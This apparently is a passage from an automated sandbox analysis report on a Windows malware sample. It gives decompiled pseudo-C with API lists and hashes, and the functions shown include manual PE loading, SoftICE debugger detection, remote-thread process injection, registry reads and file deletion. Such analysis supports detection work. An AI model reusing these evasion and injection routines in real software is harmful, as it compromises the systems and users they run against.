						_t175 = VirtualAlloc( *((intOrPtr*)(_t213 + 0xc + (_t185 + _t185 * 4) * 8)) + _v16, _t208, 0x1000, 4); // executed
						_v48 = _t175;
						E00401414(_v48, _t208);
						E00401258( *((intOrPtr*)(_t213 + 0x14 + (_t185 + _t185 * 4) * 8)) + _v44, _v52, _v48);
						_t185 = _t185 + 1;
						_t66 =  &_v60;
						 *_t66 = _v60 - 1;
					} while ( *_t66 != 0);
				}
				_t138 =  *((intOrPtr*)(_v8 + 0x28)) + _v16;
				_v28 = _t138;
				_v24 = _t138;
				_v36 = _v16;
				_v32 =  *(_v8 + 0x50);
				_push(0);
				E00402FBC();
				_t145 =  *((intOrPtr*)(_v8 + 0xa0));
				if( *((intOrPtr*)(_v8 + 0xa0)) != 0) {
					E00403D08(_t145 + _v16, _t215);
				}
				_t147 =  *((intOrPtr*)(_v8 + 0x80));
				if( *((intOrPtr*)(_v8 + 0x80)) != 0) {
					E00403D84(_t147 + _v16, _t183, _t208, _t213, _t215); // executed
				}
				_t150 = ( *(_v8 + 6) & 0x0000ffff) - 1;
				if(_t150 >= 0) {
					_v60 = _t150 + 1;
					_t184 = 0;
					do {
						_t209 = _t184 + _t184 * 4;
						VirtualProtect( *((intOrPtr*)(_t213 + 0xc + _t209 * 8)) + _v16,  *(_t213 + 8 + _t209 * 8), E00403C98( *((intOrPtr*)(_t213 + 0x24 + _t209 * 8))),  &_v56); // executed
						_t184 = _t184 + 1;
						_t101 =  &_v60;
						 *_t101 = _v60 - 1;
					} while ( *_t101 != 0);
				}
				_t189 =  *0x4037bc; // 0x4037c0
				E00402704(_a4, _t189,  &_v36);
				_pop(_t204);
				 *[fs:eax] = _t204;
				_push(E004040C1);
				_t205 =  *0x4037bc; // 0x4037c0
				return E004024F0( &_v36, _t205);
			}


































                                    0x00403ec0
                                    0x00403ec1
                                    0x00403ec3
                                    0x00403ec8
                                    0x00403ec9
                                    0x00403ecc
                                    0x00403ece
                                    0x00403ed4
                                    0x00403eda
                                    0x00403ee1
                                    0x00403ee2
                                    0x00403ee7
                                    0x00403eea
                                    0x00403ef2
                                    0x00403ef3
                                    0x00403efa
                                    0x00403efe
                                    0x00403f05
                                    0x00403f17
                                    0x00403f1c
                                    0x00403f28
                                    0x00403f3d
                                    0x00403f42
                                    0x00403f51
                                    0x00403f67
                                    0x00403f79
                                    0x00403f82
                                    0x00403f85
                                    0x00403f88
                                    0x00403f8b
                                    0x00403f8d
                                    0x00403f90
                                    0x00403f9b
                                    0x00403fa1
                                    0x00403fa3
                                    0x00403fa6
                                    0x00403fa9
                                    0x00403fa9
                                    0x00403fbf
                                    0x00403fc4
                                    0x00403fce
                                    0x00403fe3
                                    0x00403fe8
                                    0x00403fe9
                                    0x00403fe9
                                    0x00403fe9
                                    0x00403f8d
                                    0x00403ff4
                                    0x00403ff7
                                    0x00403ffa
                                    0x00404000
                                    0x00404009
                                    0x0040400c
                                    0x0040401c
                                    0x00404027
                                    0x0040402f
                                    0x00404035
                                    0x0040403a
                                    0x0040403e
                                    0x00404046
                                    0x0040404c
                                    0x00404051
                                    0x00404059
                                    0x0040405c
                                    0x0040405f
                                    0x00404062
                                    0x00404064
                                    0x00404068
                                    0x00404082
                                    0x00404087
                                    0x00404088
                                    0x00404088
                                    0x00404088
                                    0x00404064
                                    0x00404093
                                    0x00404099
                                    0x004040a0
                                    0x004040a3
                                    0x004040a6
                                    0x004040ae
                                    0x004040b9

                                    APIs
                                    • VirtualAlloc.KERNEL32(?,?,00002000,00000001), ref: 00403F17
                                    • VirtualAlloc.KERNEL32(?,?,00001000,00000004,?,?,00002000,00000001), ref: 00403F3D
                                    • VirtualProtect.KERNEL32(?,?,00000002,?,?,?,00001000,00000004,?,?,00002000,00000001), ref: 00403F67
                                    • VirtualAlloc.KERNEL32(?,?,00001000,00000004,?,?,00000002,?,?,?,00001000,00000004,?,?,00002000,00000001), ref: 00403FBF
                                    • VirtualProtect.KERNEL32(?,?,00000000,?,00000001), ref: 00404082
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.517435499.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000004.00000002.517422434.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517448285.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517455139.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517487223.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517498005.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Virtual$Alloc$Protect
                                    • String ID:
                                    • API String ID: 655996629-0
                                    • Opcode ID: 551762122f1815908c531378ade1b61ffac38d8ef792ece962969a478a327540
                                    • Instruction ID: b04bee7947df74310e6e8ccd123ea0b1f62a61930ae828744bf4897096846573
                                    • Opcode Fuzzy Hash: 551762122f1815908c531378ade1b61ffac38d8ef792ece962969a478a327540
                                    • Instruction Fuzzy Hash: C371D475A00208AFCB10DFA9D981EAEB7F8FF48314F15856AE905F7391D634EA04CB64
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00406088, Relevance: 6.1, APIs: 4, Instructions: 83registryCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 75%
                                    			E00406088(void* __eax, void* __ebx, char __ecx, intOrPtr __edx, void* __esi, void* __eflags, intOrPtr* _a4, char _a8) {
				intOrPtr _v8;
				char _v12;
				void* _v16;
				int _v20;
				int _v24;
				long _t35;
				long _t46;
				intOrPtr _t66;
				void* _t72;
				char* _t73;
				void* _t76;

				_v12 = __ecx;
				_v8 = __edx;
				_t72 = __eax;
				_t60 = _a4;
				E00401F38(_v8);
				E00401F38(_v12);
				E00401F38(_a8);
				_push(_t76);
				_push(0x406167);
				_push( *[fs:eax]);
				 *[fs:eax] = _t76 + 0xffffffec;
				E00401B14(_a4, _a8);
				_t35 = RegOpenKeyExA(_t72, E00401F48(_v8), 0, 1,  &_v16); // executed
				if(_t35 == 0) {
					_t73 = E00401F48(_v12);
					_t46 = RegQueryValueExA(_v16, _t73, 0,  &_v20, 0,  &_v24); // executed
					if(_t46 == 0) {
						E00402074(_t60, _v24);
						RegQueryValueExA(_v16, _t73, 0,  &_v20, E00401F48( *_t60),  &_v24); // executed
						E00402074(_t60, _v24 - 1);
					}
					RegCloseKey(_v16); // executed
				}
				_pop(_t66);
				 *[fs:eax] = _t66;
				_push(E0040616E);
				E00401AE4( &_v12, 2);
				return E00401AC0( &_a8);
			}














                                    0x00406090
                                    0x00406093
                                    0x00406096
                                    0x00406098
                                    0x0040609e
                                    0x004060a6
                                    0x004060ae
                                    0x004060b5
                                    0x004060b6
                                    0x004060bb
                                    0x004060be
                                    0x004060c6
                                    0x004060dd
                                    0x004060e4
                                    0x004060fa
                                    0x00406101
                                    0x00406108
                                    0x0040610f
                                    0x0040612b
                                    0x00406136
                                    0x00406136
                                    0x0040613f
                                    0x0040613f
                                    0x00406146
                                    0x00406149
                                    0x0040614c
                                    0x00406159
                                    0x00406166

                                    APIs
                                    • RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00000001,?,00000000,00406167), ref: 004060DD
                                    • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00000000,?,80000001,00000000,00000000,00000001,?,00000000,00406167), ref: 00406101
                                    • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00000000,?,?,00000000,00000000,?,00000000,?,80000001,00000000,00000000,00000001), ref: 0040612B
                                    • RegCloseKey.ADVAPI32(?,?,00000000,00000000,?,00000000,?,80000001,00000000,00000000,00000001,?,00000000,00406167), ref: 0040613F
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.517435499.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000004.00000002.517422434.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517448285.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517455139.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517487223.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517498005.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: QueryValue$CloseOpen
                                    • String ID:
                                    • API String ID: 1586453840-0
                                    • Opcode ID: b106ff00d2019447eb815b6a70ce28f6bc541ad976cbeee6ba3fa94798fc6654
                                    • Instruction ID: 0e00d036d103dc2b2ef1cfb5c67197bce49365ef8cbb96d3ced269820940c9d9
                                    • Opcode Fuzzy Hash: b106ff00d2019447eb815b6a70ce28f6bc541ad976cbeee6ba3fa94798fc6654
                                    • Instruction Fuzzy Hash: 3021E075A00109BBDB00EBA9CC82EAE77BCEF49354F504176B914F72D1D778AE058764
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00405D70, Relevance: 6.1, APIs: 4, Instructions: 58fileCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 68%
                                    			E00405D70(intOrPtr __eax, void* __ebx, long __ecx, char __edx, void* __esi, void* __eflags) {
				intOrPtr _v8;
				char _v12;
				long _v16;
				void* _t17;
				void* _t28;
				intOrPtr _t33;
				long _t36;
				void* _t39;

				_t36 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				E00401F38(_v8);
				E00401F38(_v12);
				_push(_t39);
				_push(0x405e0a);
				_push( *[fs:eax]);
				 *[fs:eax] = _t39 + 0xfffffff4;
				_t17 = CreateFileA(E00401F48(_v8), 0x40000000, 2, 0, 2, 0, 0); // executed
				_t28 = _t17;
				if(_t28 != 0xffffffff) {
					if(_t36 == 0xffffffff) {
						SetFilePointer(_t28, 0, 0, 0);
					}
					WriteFile(_t28, E00401F9C( &_v12), _t36,  &_v16, 0); // executed
					CloseHandle(_t28); // executed
				}
				_pop(_t33);
				 *[fs:eax] = _t33;
				_push(E00405E11);
				return E00401AE4( &_v12, 2);
			}











                                    0x00405d78
                                    0x00405d7a
                                    0x00405d7d
                                    0x00405d83
                                    0x00405d8b
                                    0x00405d92
                                    0x00405d93
                                    0x00405d98
                                    0x00405d9b
                                    0x00405db6
                                    0x00405dbb
                                    0x00405dc0
                                    0x00405dc5
                                    0x00405dce
                                    0x00405dce
                                    0x00405de4
                                    0x00405dea
                                    0x00405dea
                                    0x00405df1
                                    0x00405df4
                                    0x00405df7
                                    0x00405e09

                                    APIs
                                    • CreateFileA.KERNEL32(00000000,40000000,00000002,00000000,00000002,00000000,00000000,00000000,00405E0A), ref: 00405DB6
                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,00000000,40000000,00000002,00000000,00000002,00000000,00000000,00000000,00405E0A), ref: 00405DCE
                                    • WriteFile.KERNEL32(00000000,00000000,?,?,00000000,00000000,40000000,00000002,00000000,00000002,00000000,00000000,00000000,00405E0A), ref: 00405DE4
                                    • CloseHandle.KERNEL32(00000000,00000000,00000000,?,?,00000000,00000000,40000000,00000002,00000000,00000002,00000000,00000000,00000000,00405E0A), ref: 00405DEA
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.517435499.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000004.00000002.517422434.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517448285.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517455139.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517487223.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517498005.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: File$CloseCreateHandlePointerWrite
                                    • String ID:
                                    • API String ID: 3604237281-0
                                    • Opcode ID: 7dc1bfca9d025d0b83b5e26c46da853ac632ff7e58f76998c26eff8db92b4821
                                    • Instruction ID: 55d088da9265c3b5ae2f525a133c65af5c973924d17bad78a6645e8f940914b1
                                    • Opcode Fuzzy Hash: 7dc1bfca9d025d0b83b5e26c46da853ac632ff7e58f76998c26eff8db92b4821
                                    • Instruction Fuzzy Hash: F1116D70A407047AE720BB75CC83F9F76ACDB05728FA04677B510B62E2DA786E00896C
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00405850, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18fileCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E00405850() {
				void* _t1;
				void* _t4;

				_t4 = 0;
				_t1 = CreateFileA("\\\\.\\NTICE", 0xc0000000, 3, 0, 3, 0x80, 0); // executed
				if(_t1 != 0xffffffff) {
					CloseHandle(_t1);
					_t4 = 1;
				}
				return _t4;
			}





                                    0x00405851
                                    0x0040586a
                                    0x00405872
                                    0x00405875
                                    0x0040587a
                                    0x0040587a
                                    0x0040587f

                                    APIs
                                    • CreateFileA.KERNEL32(\\.\NTICE,C0000000,00000003,00000000,00000003,00000080,00000000,00000000,0040589D,00000000,0040B212,00000000,0040BF40,00000000,00000000,00000000), ref: 0040586A
                                    • CloseHandle.KERNEL32(00000000,\\.\NTICE,C0000000,00000003,00000000,00000003,00000080,00000000,00000000,0040589D,00000000,0040B212,00000000,0040BF40,00000000,00000000), ref: 00405875
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.517435499.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000004.00000002.517422434.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517448285.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517455139.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517487223.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517498005.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: CloseCreateFileHandle
                                    • String ID: \\.\NTICE
                                    • API String ID: 3498533004-2502798147
                                    • Opcode ID: debc4518062f563bffe564e22a037e3d6494d17ef5953f9ebd345af3da82e7ec
                                    • Instruction ID: dcdfadaa743e4582149ecbcd816e92e043e7093f062ec94bd67b511fcc83bcd2
                                    • Opcode Fuzzy Hash: debc4518062f563bffe564e22a037e3d6494d17ef5953f9ebd345af3da82e7ec
                                    • Instruction Fuzzy Hash: 27D0CAB238170039F83438A92C97F1A440C9701B29EA0833ABB20BA1E1C4A8AA29021C
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00405814, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18fileCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E00405814() {
				void* _t1;
				void* _t4;

				_t4 = 0;
				_t1 = CreateFileA("\\\\.\\SICE", 0xc0000000, 3, 0, 3, 0x80, 0); // executed
				if(_t1 != 0xffffffff) {
					CloseHandle(_t1);
					_t4 = 1;
				}
				return _t4;
			}





                                    0x00405815
                                    0x0040582e
                                    0x00405836
                                    0x00405839
                                    0x0040583e
                                    0x0040583e
                                    0x00405843

                                    APIs
                                    • CreateFileA.KERNEL32(\\.\SICE,C0000000,00000003,00000000,00000003,00000080,00000000,00000000,00405894,00000000,0040B212,00000000,0040BF40,00000000,00000000,00000000), ref: 0040582E
                                    • CloseHandle.KERNEL32(00000000,\\.\SICE,C0000000,00000003,00000000,00000003,00000080,00000000,00000000,00405894,00000000,0040B212,00000000,0040BF40,00000000,00000000), ref: 00405839
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.517435499.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000004.00000002.517422434.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517448285.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517455139.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517487223.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517498005.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: CloseCreateFileHandle
                                    • String ID: \\.\SICE
                                    • API String ID: 3498533004-948585333
                                    • Opcode ID: ff68a70177764c28d499507b68599e559ed85a22d0656cccf2f85e6c98713594
                                    • Instruction ID: 3ad54f1ae86a7dc7f46777f6809a8286594d703ee9eb335483981d0cf1385b1e
                                    • Opcode Fuzzy Hash: ff68a70177764c28d499507b68599e559ed85a22d0656cccf2f85e6c98713594
                                    • Instruction Fuzzy Hash: B8D012723C170039F83038A51C97F07400C5701B2DEB08336BB10BD1E1C4F8B619051C
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00405A28, Relevance: 4.6, APIs: 3, Instructions: 59fileCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 52%
                                    			E00405A28(char __eax, void* __ebx, void* __edi, void* __esi, void* __eflags) {
				char _v8;
				char _v9;
				void* _t13;
				int _t24;
				intOrPtr _t36;
				intOrPtr _t37;
				CHAR* _t40;
				void* _t42;
				void* _t43;
				intOrPtr _t44;
				void* _t45;

				_t45 = __eflags;
				_t42 = _t43;
				_t44 = _t43 + 0xfffffff8;
				_push(__ebx);
				_v8 = __eax;
				E00401F38(_v8);
				_push(_t42);
				_push(0x405ac7);
				_push( *[fs:eax]);
				 *[fs:eax] = _t44;
				_v9 = 0;
				_t13 = E00405D04(_v8, __ebx, _t45); // executed
				if(_t13 != 0) {
					_push(_t42);
					_push(0x405aa7);
					_push( *[fs:eax]);
					 *[fs:eax] = _t44;
					_t40 = E00401F48(_v8);
					GetFileAttributesA(_t40); // executed
					SetFileAttributesA(_t40, 0); // executed
					_t24 = DeleteFileA(_t40); // executed
					asm("sbb eax, eax");
					_v9 = _t24 + 1;
					_pop(_t37);
					 *[fs:eax] = _t37;
				}
				_pop(_t36);
				 *[fs:eax] = _t36;
				_push(E00405ACE);
				return E00401AC0( &_v8);
			}














                                    0x00405a28
                                    0x00405a29
                                    0x00405a2b
                                    0x00405a2e
                                    0x00405a31
                                    0x00405a37
                                    0x00405a3e
                                    0x00405a3f
                                    0x00405a44
                                    0x00405a47
                                    0x00405a4a
                                    0x00405a51
                                    0x00405a58
                                    0x00405a5c
                                    0x00405a5d
                                    0x00405a62
                                    0x00405a65
                                    0x00405a70
                                    0x00405a73
                                    0x00405a89
                                    0x00405a8f
                                    0x00405a97
                                    0x00405a9a
                                    0x00405a9f
                                    0x00405aa2
                                    0x00405aa2
                                    0x00405ab3
                                    0x00405ab6
                                    0x00405ab9
                                    0x00405ac6

                                    APIs
                                      • Part of subcall function 00405D04: FindFirstFileA.KERNEL32(00000000,?,00000000,00405D61,?,?,?,00405A56,00000000,00405AC7), ref: 00405D39
                                      • Part of subcall function 00405D04: FindClose.KERNEL32(00000000,00000000,?,00000000,00405D61,?,?,?,00405A56,00000000,00405AC7), ref: 00405D44
                                    • GetFileAttributesA.KERNEL32(00000000,00000000,00405AA7,?,00000000,00405AC7), ref: 00405A73
                                    • SetFileAttributesA.KERNEL32(00000000,00000000,00000000,00000000,00405AA7,?,00000000,00405AC7), ref: 00405A89
                                    • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00405AA7,?,00000000,00405AC7), ref: 00405A8F
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.517435499.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000004.00000002.517422434.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517448285.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517455139.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517487223.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517498005.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: File$AttributesFind$CloseDeleteFirst
                                    • String ID:
                                    • API String ID: 996707796-0
                                    • Opcode ID: bfaa1bf5a76bb33d25c94b861d856369e6bc4f61e8fef42f9b41c50ef0775c6e
                                    • Instruction ID: 1c4186debc08bb4691b9d877f2086b3288a94b326db33eea14d01e2d90e30b07
                                    • Opcode Fuzzy Hash: bfaa1bf5a76bb33d25c94b861d856369e6bc4f61e8fef42f9b41c50ef0775c6e
                                    • Instruction Fuzzy Hash: 52110230324644AED702DB658C12A9F7BECDB0A704F6204BAF400E22D2D67D5E00DA68
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 004038AC, Relevance: 4.6, APIs: 3, Instructions: 51synchronizationthreadinjectionCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E004038AC(void* __eax, void* __ecx, void* __edx, char _a4, long _a8) {
				void* _v8;
				long _v12;
				long _v16;
				void* _t16;
				void* _t23;
				void* _t31;
				void* _t32;
				void* _t33;

				_v8 = __ecx;
				_t31 = __edx;
				_t23 = __eax;
				_t33 = E0040387C(__eax, _a8, _v8);
				_t16 = CreateRemoteThread(_t23, 0, 0, E0040387C(_t23, E004037DC(__edx), _t31), _t33, 0,  &_v16); // executed
				_t32 = _t16;
				if(_a4 != 0) {
					WaitForSingleObject(_t32, 0xffffffff);
					ReadProcessMemory(_t23, _t33, _v8, _a8,  &_v12);
				}
				return _t32;
			}











                                    0x004038b5
                                    0x004038b8
                                    0x004038ba
                                    0x004038c9
                                    0x004038ea
                                    0x004038ef
                                    0x004038f5
                                    0x004038fa
                                    0x0040390d
                                    0x0040390d
                                    0x0040391a

                                    APIs
                                      • Part of subcall function 0040387C: VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040,?,?,?,?,?,004038C9), ref: 00403892
                                      • Part of subcall function 0040387C: WriteProcessMemory.KERNEL32(?,00000000,?,?,?,?,00000000,?,00003000,00000040,?,?,?,?,?,004038C9), ref: 0040389E
                                    • CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 004038EA
                                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004038FA
                                    • ReadProcessMemory.KERNEL32(?,00000000,?,?,00000000,00000000,000000FF), ref: 0040390D
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.517435499.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000004.00000002.517422434.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517448285.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517455139.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517487223.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517498005.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: MemoryProcess$AllocCreateObjectReadRemoteSingleThreadVirtualWaitWrite
                                    • String ID:
                                    • API String ID: 3966641755-0
                                    • Opcode ID: 51aba04c633cb2b561979a642a955c1eb1e5a5082f4e13737333612bceef90ab
                                    • Instruction ID: 98dfc2b63562e43be382328cbb186e20acb4a9321053857b4be2ba9adcb19dad
                                    • Opcode Fuzzy Hash: 51aba04c633cb2b561979a642a955c1eb1e5a5082f4e13737333612bceef90ab
                                    • Instruction Fuzzy Hash: D9018F717001087BD710EA6E8C81FAFBBED8B89325F20857AB518E73C1D974DE0083A8
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040555C, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 58COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 37%
                                    			E0040555C(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				long _v8;
				char _v12;
				char _v16;
				char _v20;
				void* _t28;
				intOrPtr _t41;
				intOrPtr _t45;
				intOrPtr _t50;
				intOrPtr _t51;
				void* _t52;

				_t52 = __eflags;
				_t48 = __esi;
				_t47 = __edi;
				_t50 = _t51;
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_push(_t50);
				_push(0x405607);
				_push( *[fs:eax]);
				 *[fs:eax] = _t51;
				_push(_t50);
				_push( *[fs:eax]);
				 *[fs:eax] = _t51;
				_v8 = 0x100;
				E00402074( &_v12, _v8);
				GetUserNameA(E00401F48(_v12),  &_v8); // executed
				_pop(_t41);
				 *[fs:eax] = _t41;
				E00404740(_v12, __ebx,  &_v16, __edi, __esi, _t52);
				_push(_v16);
				E00404740("CurrentUser", __ebx,  &_v20, _t47, _t48, _t52);
				_pop(_t28);
				E00401E94(_t28, _v20);
				_t45 = 0x4055b2;
				 *[fs:eax] = _t45;
				_push(E0040560E);
				return E00401AE4( &_v20, 3);
			}













                                    0x0040555c
                                    0x0040555c
                                    0x0040555c
                                    0x0040555d
                                    0x00405561
                                    0x00405562
                                    0x00405563
                                    0x00405564
                                    0x00405565
                                    0x00405566
                                    0x00405567
                                    0x0040556a
                                    0x0040556b
                                    0x00405570
                                    0x00405573
                                    0x00405578
                                    0x0040557e
                                    0x00405581
                                    0x00405584
                                    0x00405591
                                    0x004055a3
                                    0x004055aa
                                    0x004055ad
                                    0x004055ca
                                    0x004055d2
                                    0x004055db
                                    0x004055e3
                                    0x004055e4
                                    0x004055ee
                                    0x004055f1
                                    0x004055f4
                                    0x00405606

                                    APIs
                                    • GetUserNameA.ADVAPI32(00000000,00000100), ref: 004055A3
                                      • Part of subcall function 00404740: CharUpperA.USER32(?,00000000,004047B5), ref: 0040477E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.517435499.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000004.00000002.517422434.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517448285.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517455139.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517487223.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517498005.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: CharNameUpperUser
                                    • String ID: CurrentUser
                                    • API String ID: 2323927870-4020899948
                                    • Opcode ID: 853bb1a9f8488690d3976ac596565df22d622e323bac42d31dd580fe65a838f1
                                    • Instruction ID: 79fc34cd5b686bd2ad1a611b0b6b124d48364b0ba66751db6594d0a242cb1dd3
                                    • Opcode Fuzzy Hash: 853bb1a9f8488690d3976ac596565df22d622e323bac42d31dd580fe65a838f1
                                    • Instruction Fuzzy Hash: 65117375514604BEDB05DB91DC56CAF77BCE749700B91487AF400E3680D7786E048964
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00406660, Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E00406660(void* __eax) {
				signed char _t5;

				_t5 = GetFileAttributesA(E00401F48(__eax)); // executed
				if(_t5 == 0xffffffff || (_t5 & 0x00000010) == 0) {
					return 0;
				} else {
					return 1;
				}
			}




                                    0x0040666b
                                    0x00406673
                                    0x0040667c
                                    0x0040667d
                                    0x00406680
                                    0x00406680

                                    APIs
                                    • GetFileAttributesA.KERNEL32(00000000,00000000,004066BB,00000000,00406794,?,?,00000000,00000000,00000000,00000000), ref: 0040666B
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.517435499.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000004.00000002.517422434.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517448285.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517455139.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517487223.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517498005.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: AttributesFile
                                    • String ID:
                                    • API String ID: 3188754299-0
                                    • Opcode ID: 8d8daad035d5671b8178c2915dad3478ed26a251ea86b8f1ac7929fd72162bf1
                                    • Instruction ID: fca0ec8dcb75db4ffbb1fbdbb764ae01d2ede40a2229cdd6f6647931c02f8f91
                                    • Opcode Fuzzy Hash: 8d8daad035d5671b8178c2915dad3478ed26a251ea86b8f1ac7929fd72162bf1
                                    • Instruction Fuzzy Hash: B8C08CE02012000ADE10A9FE0CC1A1A02C80E1437AB602F7BF039F33E2E27F88322028
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00403566, Relevance: 1.5, APIs: 1, Instructions: 15synchronizationCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 68%
                                    			E00403566(struct _SECURITY_ATTRIBUTES* _a4, void* _a8, CHAR* _a12) {
				void* _t8;

				_t4 = _a12;
				asm("sbb eax, eax");
				_t8 = CreateMutexA(_a4,  &(_a12[1]) & 0x0000007f, _t4); // executed
				return _t8;
			}




                                    0x0040356b
                                    0x00403573
                                    0x0040357e
                                    0x00403584

                                    APIs
                                    • CreateMutexA.KERNEL32(?,?,?,?,?), ref: 0040357E
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.517435499.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000004.00000002.517422434.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517448285.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517455139.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517487223.0000000000451000.00000080.00020000.sdmp Download File
